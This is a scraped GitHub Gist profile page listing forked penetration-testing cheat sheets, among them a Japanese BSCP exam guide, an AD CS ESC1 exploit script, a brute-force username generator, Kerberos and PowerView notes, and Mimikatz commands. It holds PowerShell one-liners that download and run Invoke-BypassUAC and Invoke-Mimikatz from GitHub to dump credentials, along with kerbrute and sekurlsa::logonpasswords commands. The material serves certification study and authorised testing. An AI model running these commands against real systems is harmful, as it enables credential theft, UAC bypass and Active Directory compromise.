- 制限時間は4時間
- 2つの脆弱なアプリケーションを攻略する
- それぞれのアプリケーションでの流れは以下の通り
- ステージ1: 任意のユーザー アカウントを奪う。
- ステージ2: アカウントを使用して /admin の管理インターフェイスにアクセスする。おそらく、権限を昇格させるか、管理者アカウントを侵害する。
- ステージ3: 管理インターフェイスを使用して、サーバーのファイルシステムから
/home/carlos/secretの内容を読み取り、"submit solution" を使用して送信する。
- ユーザー名「 administrator 」を持つ管理者アカウントと、通常は「 carlos 」と呼ばれる権限の低いアカウントが常に存在する。ユーザー名列挙の脆弱性が見つかった場合、次のユーザー名リストとパスワードリストを使用して、権限の低いアカウントに侵入できる可能性がある。
- 各アプリケーションには最大1人のアクティブユーザーがおり、ユーザーまたは管理者としてログインする。ユーザーは15秒ごとにサイトのホームページにアクセスし、アプリケーションから受信した電子メールのリンクをクリックすると想定できる。エクスプロイトサーバーの「被害者への送信」機能を使用して、反映された脆弱性をターゲットにすることができる。
- SSRFの脆弱性が見つかった場合は、ローカルホストのポート6566 で実行されている内部専用サービスにアクセスすることで、それを使用してファイルを読み取ることができる。
sg1965
sg1965
/ bscp.md
Created
December 18, 2023 13:15
— forked from wonda-tea-coffee/bscp.md
BSCP攻略チートシート
sg1965
/ esc1.ps1
Created
October 9, 2023 12:28
— forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
sg1965
/ namemash.py
Created
August 13, 2023 04:35
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |
sg1965
/ Active Directory Attacks.md
Created
November 25, 2022 06:13
— forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
sg1965
/ OSCP_Redteam_Powershell_Cheatsheet.md
Created
October 22, 2022 05:38
— forked from ssstonebraker/OSCP_Redteam_Powershell_Cheatsheet.md
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
sg1965
/ OSCP_notes_brakertech.md
Created
October 22, 2022 05:36
— forked from ssstonebraker/OSCP_notes_brakertech.md
OSCP Notes #oscp
sg1965
/ OSCP_notes_brakertech.md
Created
October 22, 2022 05:35
— forked from dec0mrad3/OSCP_notes_brakertech.md
OSCP Notes #oscp
sg1965
/ PowerView-3.0-tricks.ps1
Created
October 20, 2022 14:44
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
sg1965
/ kerberos_attacks_cheatsheet.md
Created
October 19, 2022 11:25
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
sg1965
/ Mimikatz-cheatsheet
Created
October 14, 2022 08:11
— forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
NewerOlder